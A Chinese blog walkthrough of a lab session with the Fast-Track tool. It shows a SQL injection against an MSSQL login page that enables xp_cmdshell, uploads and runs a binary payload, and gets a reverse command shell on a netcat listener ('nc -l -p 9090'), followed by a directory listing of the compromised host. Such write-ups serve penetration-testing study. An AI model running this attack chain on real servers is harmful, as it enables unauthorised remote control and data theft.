首页 > 数据库 >SQL Injector - GET Manual Setup Binary Payload Attack

SQL Injector - GET Manual Setup Binary Payload Attack

时间:2023-04-26 18:32:50浏览次数:40  
标签:Binary 07 ... 03 Setup GET SQL Injector 2013


bt5上操作:

*****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 4
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

    The manual portion allows you to customize your attack for whatever reason.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
    
    <ctrl>-c to exit to Main Menu...    

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
Enter the IP Address of server with NetCat Listening: 192.168.1.11
Enter Port number with NetCat listening: 9090


    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload....
    Sending second portion of payload....
    Sending next portion of payload...
    Sending the last portion of the payload...
    Running cleanup...
    Running the payload on the server...



另起一个bash运行nc获得了反向cmdshell:

root@bt:~# nc -l -p 9090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-07-02  21:45    <DIR>          msf3
2012-08-07  03:10       176,204,554 msf3.zip
2004-12-29  13:07            61,440 nc.exe
2013-07-01  22:45    <DIR>          Program Files
2013-05-01  22:15        16,232,448 python-2.7.4.msi
2013-07-06  17:57    <DIR>          Python27
2013-04-07  21:03        70,402,968 SQL2000SP4.exe
2013-06-30  21:58    <DIR>          SQL2KSP4
2013-06-30  21:53    <DIR>          SQLEVAL
2011-03-22  17:38       349,280,992 sqleval.exe
2013-07-01  20:52    <DIR>          WINDOWS
2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe
               8 个文件    633,051,106 字节
               7 个目录  3,908,493,312 可用字节

C:\>exit
exit
root@bt:~#




标签:Binary,07,...,03,Setup,GET,SQL,Injector,2013
From: https://blog.51cto.com/u_1002776/6228461

相关文章

  • 一统天下 flutter - widget 列表类: Dismissible - 滑动删除
    源码https://github.com/webabcd/flutter_demo作者webabcd一统天下flutter-widget列表类:Dismissible-滑动删除示例如下:lib\widget\list\dismissible.dart/**Dismissible-滑动删除**支持左滑/右滑/上滑/下滑删除,一般在列表中使用,当然也可以不依托列表......
  • 一统天下 flutter - widget 列表类: DataTable - 数据表格
    源码https://github.com/webabcd/flutter_demo作者webabcd一统天下flutter-widget列表类:DataTable-数据表格示例如下:lib\widget\list\data_table.dart/**DataTable-数据表格*/import'dart:math';import'package:flutter/material.dart';import......
  • 【go】go语言变量类型 常量 函数基础 函数高级 setuptools将python项目打包 前后端联
    目录昨日回顾使用setuptools将python项目打包前后端联调今日内容1go语言变量类型2常量3函数基础4函数高级补充昨日回顾使用setuptools将python项目打包#https://zhuanlan.zhihu.com/p/624648232#python----》setuptools--》whl包结构 公司内部写了包---》公司内部用---......
  • MFC-GetBkMode获取指定DC的背景混合模式
     HDChdc=::GetDC(m_hWnd);LOGFONTlf={0};lf.lfWeight=16;//平均宽度lf.lfHeight=40;//字体高度lf.lfCharSet=GB2312_CHARSET;//字符集lstrcpy(lf.lfFaceName,_T("宋体"));HFONThfont=::CreateFontIndirect(&lf)......
  • 解决 NET6 GET请求不设置参数值报错问题
    1、调用的方法1///<summary>2///获取干预集合3///</summary>4///<returns></returns>5[HttpGet]6publicJsonResultGetIntervenes(stringkeyword)7{89Li......
  • MFC-GetTopWindow获取指定窗口的子窗口中最顶层的窗口句柄
     //GetTopWindowHWNDhWnd=::FindWindow(_T("#32770"),_T("测试程序"));if(!hWnd){AfxMessageBox(_T("请打开测试程序"));ExitProcess(0);}CStringstr;str.Format(_T("主窗口句柄:hWnd=%d\r\n&q......
  • wget命令解析
    wget命令是Linux系统用于从Web下载文件的命令行工具,支持HTTP、HTTPS及FTP协议下载文件,而且wget还提供了很多选项,例如下载多个文件、后台下载,使用代理等等,使用非常方便。接下来就介绍一下wget的使用方法。wget命令的使用语法格式wget[options][url]#示例,默认下载目......
  • 如何在dockerfile中降apt-get源更换为中国国内源
    注意要确认自己的系统是debian还是ubutnu,这两个系统的源是完全不一样的在Dockerfile中将apt-get源更换为中国国内源,您可以通过以下步骤完成:在Dockerfile的开头添加以下内容:#设置为中国国内源RUNsed-i's/archive.ubuntu.com/mirrors.aliyun.com/g'/etc/apt/sources.list......
  • Python语言学习讲解十六:python之描述符__set__和__get__ 等解释
    一、方法:首先说下python中存在的几种方法:对象方法、静态方法、类方法等,归属权分别为obj、cls、cls其实可以从他们的参数中就可以看的出来对象方法参数中含有self,这个类似于C++中的this指针。静态方法使用@staticmethod来修饰,可以通过类或类的实例对象来调用而已.1.>>>class2.......
  • 目录操作函数(mkdir rmdir rename chdir getcwd opendir closedir readdir dup dup2)
      /*创建文件#include<sys/stat.h>#include<sys/types.h>intmkdir(constchar*pathname,mode_tmode);参数:mode:权限移除文件#include<unistd.h>intrmdir(constc......